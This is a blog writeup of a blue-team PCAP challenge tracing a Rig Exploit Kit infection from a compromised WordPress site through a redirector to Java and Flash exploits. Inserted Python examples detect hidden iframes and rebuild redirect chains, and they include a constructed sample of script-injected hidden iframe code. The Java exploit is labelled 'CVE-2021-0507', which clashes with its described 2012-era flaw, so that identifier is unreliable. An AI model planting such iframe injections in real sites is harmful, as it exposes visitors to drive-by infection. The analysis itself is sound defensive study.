Rig Exploitation Kit Infection — Malware Traffic Analysis

Hacktivities
Published in System Weakness
6 min read · Jan 30, 2022


In this article, I use NetworkMiner and Wireshark to analyze a PCAP file that contains Rig Exploitation Kit infection traffic. The PCAP file belongs to a blue-team-focused challenge on the CyberDefenders website, titled “Malware Traffic Analysis 1”, and was created by Brad Duncan.

Disclaimer

I like to add a brief disclaimer before a writeup to encourage people to attempt the challenge before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the challenge more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, let's get started!

Challenge Questions

1. What is the IP address of the Windows VM that gets infected?

We can start by opening the challenge PCAP file using NetworkMiner. This is a great tool for collecting evidence before performing a deeper investigation using Wireshark.

NetworkMiner Hosts Tab.

Looking down through the NetworkMiner hosts tab, we can see a range of internal private IP addresses, including an address for a Windows machine.

Windows VM.

Since we cannot see any other Windows machines within the organization’s internal private network, we can assume that this is most likely the Windows VM that was infected, but we will need to perform further investigation to confirm this!

2. What is the hostname of the Windows VM that gets infected?

3. What is the MAC address of the infected VM?

To identify the hostname and MAC address of the identified Windows machine, we can expand its host details in NetworkMiner.

Windows VM hostname and MAC address.

4. What is the IP address of the compromised web site?

5. What is the FQDN of the compromised website?

We can start by looking at the outgoing sessions for the Windows VM in NetworkMiner.

Suspicious Domain Names.

I can see that there are 30 outgoing sessions from the Windows VM, several of which involve suspicious domains. If we look at the sessions tab in NetworkMiner, we can see the timeline of sessions for the Windows machine.

Timeline for outgoing sessions to suspicious domains.

At this point, I am going to take a deeper look at this network traffic using Wireshark. We can start by filtering for HTTP traffic to and from the IP address of the first suspicious domain highlighted in red above:

http && ip.addr == 82[.]150[.]140[.]30

Next, we can select the first HTTP filtered packet (i.e. packet no. 161) and follow the TCP stream. If we scroll down, we can see that there is a suspicious piece of JavaScript code at the bottom of the website.

Suspicious JavaScript

When the web page loads, a function called “showBrowVer()” is executed. This function embeds a hidden iframe pointing at one of the suspicious domains inside a DIV tag called “dt” on the website. Finally, if we check both suspicious domains seen in the JavaScript code on VirusTotal, we can see that they are flagged as malicious.

VirusTotal Malicious URL.
VirusTotal Malicious URL.

Based on the timeline of outgoing sessions to suspicious domains seen earlier, we can see that once the Windows VM visits the first suspicious domain highlighted in red, additional outgoing sessions occur to the other two malicious URLs seen in the piece of suspicious JavaScript.
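To make the injection pattern described above concrete, here is an added example (not from the challenge or the original post) that scans an HTML body for off-site iframes, whether written statically or built inside a script, and flags the ones styled to stay invisible. The sample page and its hostnames are constructed placeholders.

```python
"""Flag off-site iframes in an HTML body, including ones built by a script at load time."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# <iframe ... src="..."> open tags (also inside JS strings) and styling that hides a frame.
IFRAME_RE = re.compile(r'<iframe\b[^>]*\ssrc=["\']([^"\']+)["\'][^>]*>', re.I)
HIDDEN_RE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden'
                       r'|(?:width|height)\s*[:=]\s*["\']?[01](?!\d)', re.I)

class IframeFinder(HTMLParser):
    """Collects (src, hidden, via_script) for each static or script-built iframe."""
    def __init__(self):
        super().__init__()
        self.found, self._script = [], None  # _script buffers the open <script> body

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._script = []
        elif tag == "iframe" and a.get("src"):
            attr_text = " ".join(f"{k}={v}" for k, v in a.items() if v)
            self.found.append((a["src"], bool(HIDDEN_RE.search(attr_text)), False))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            for m in IFRAME_RE.finditer("".join(self._script)):
                self.found.append((m.group(1), bool(HIDDEN_RE.search(m.group(0))), True))
            self._script = None

def find_external_iframes(html, page_host):
    """Return iframes whose src host differs from the page's own host."""
    parser = IframeFinder()
    parser.feed(html)
    parser.close()
    return [f for f in parser.found if urlparse(f[0]).hostname not in (None, page_host)]

# Constructed sample page mimicking the injected pattern; hostnames are placeholders.
SAMPLE_HTML = """<html><body><p>Blog post</p>
<iframe src="http://blog.example/embed" width="640" height="360"></iframe>
<div id="dt"></div>
<script>function showBrowVer() {
  document.getElementById("dt").innerHTML = '<iframe src="http://redirector.example/gate.php" width="1" height="1" style="display:none"></iframe>';
}
window.onload = showBrowVer;</script></body></html>"""
```

Running find_external_iframes(SAMPLE_HTML, "blog.example") keeps only the script-built, hidden frame pointing at redirector.example; the same-host player iframe is dropped.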

6. What is the IP address of the server that delivered the exploit kit and malware?

7. What is the FQDN that delivered the exploit kit and malware?

8. What is the redirect URL that points to the exploit kit (EK) landing page?

If we continue to follow the TCP stream from earlier, we can see in TCP packet number 981 that once the Windows VM visits the compromised website, it is redirected to the first malicious URL, based on the request headers below.

Redirected from WordPress site to Malicious URL.

Continuing to follow the TCP stream, we are then redirected to another site by the malicious URL seen above.

Redirected from malicious URL to suspicious subdomain.

In NetworkMiner under the files tab, we can see multiple files being downloaded from the FQDN seen above.

Suspicious Files.

If we upload these files to VirusTotal, we can see that three of them are flagged as malicious.

Malicious Jar File.
Malicious Adobe Flash file.
Malicious HTML file with embedded JS code.

Based on this information, we can see that the IP address of the server that delivered the exploit kit and malware is that of the FQDN seen below.

IP address of the server that delivered the exploit kit and malware.
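The redirect chain traced above (compromised site, redirector, exploit kit server) can be reconstructed from Referer headers alone once the HTTP requests are exported from the PCAP. The following is an added example, not part of the original writeup or the challenge; the hostnames, paths and packet numbers in the sample records are constructed, not the challenge's real indicators.

```python
"""Rebuild the redirect chain from per-request HTTP metadata pulled from a PCAP.
Record layout: (packet_no, host, uri, referer, response_content_type)."""
from urllib.parse import urlparse

# MIME types of the exploit files the writeup recovered (Java archive and Flash).
EXPLOIT_TYPES = {"application/java-archive", "application/x-shockwave-flash"}

# Constructed sample mirroring the writeup's chain; hosts, paths and packet numbers are placeholders.
REQUESTS = [
    (161, "compromised-site.example", "/", "", "text/html"),
    (900, "cdn.example", "/jquery.js", "http://compromised-site.example/", "text/javascript"),
    (981, "redirector.example", "/gate.php", "http://compromised-site.example/", "text/html"),
    (1102, "ek-landing.example", "/index.php?id=1", "http://redirector.example/gate.php", "text/html"),
    (1250, "ek-landing.example", "/exploit.swf", "http://ek-landing.example/index.php?id=1",
     "application/x-shockwave-flash"),
    (1301, "ek-landing.example", "/payload.jar", "http://ek-landing.example/index.php?id=1",
     "application/java-archive"),
]

def referer_edges(requests):
    """Map each referring host to the distinct hosts it led the client on to, in packet order."""
    edges = {}
    for _, host, _, ref, _ in sorted(requests):
        ref_host = urlparse(ref).hostname
        if ref_host and ref_host != host and host not in edges.setdefault(ref_host, []):
            edges[ref_host].append(host)
    return edges

def exploit_deliveries(requests):
    """Requests whose response body was an exploit file (answers 'how many payloads')."""
    return [(pkt, host, uri) for pkt, host, uri, _, ctype in sorted(requests) if ctype in EXPLOIT_TYPES]

def infection_path(requests, seed_host):
    """Breadth-first search over Referer edges from the compromised site to the first
    host that served an exploit file; None if the chain never reaches one."""
    edges = referer_edges(requests)
    targets = {host for _, host, _ in exploit_deliveries(requests)}
    queue = [[seed_host]]
    while queue:
        path = queue.pop(0)
        if path[-1] in targets:
            return path
        for nxt in edges.get(path[-1], []):
            if nxt not in path:
                queue.append(path + [nxt])
    return None
```

Because the search stops at the first host that actually served exploit content, a benign CDN reached from the same compromised page is explored but never reported as part of the chain.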

We can also use VirusTotal and the information gathered so far to confirm the exploit kit used, by uploading the PCAP file and reviewing which Snort/Suricata alerts are triggered.

VirusTotal Exploit Kit Name.

VirusTotal shows that Rig EK has been identified as the exploit kit that was used.

9. Other than the CVE-2013-2551 IE exploit, another application was targeted by the EK and starts with “J”. Provide the full application name.

Of the three malicious files identified, we can see that one is a malicious Jar file. Based on the output from VirusTotal, we can see that this malicious Jar file is related to CVE-2021-0507. According to the CVE description, it is an unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier.

10. How many times was the payload delivered?

We can see that three malicious files were delivered to the infected Windows VM.

12. The compromised website has a malicious script with a URL. What is this URL?

As seen earlier when analyzing the JavaScript code and answering question 8, the malicious URL is the one shown below:

URL used in malicious JavaScript.

13. Extract the two exploit files. What are the MD5 file hashes? (comma-separated)

We can get the MD5 hashes of both exploit files by using NetworkMiner and viewing their properties:

Malicious Jar File MD5 Hash.
Malicious Adobe Flash file MD5 Hash.

Closing Remarks

I found this challenge great for practicing with NetworkMiner and Wireshark. I also really enjoyed working through this PCAP challenge file and understanding how the Rig exploitation kit infected the Windows VM. Thank you for reading till the end and keep hacking 😄!
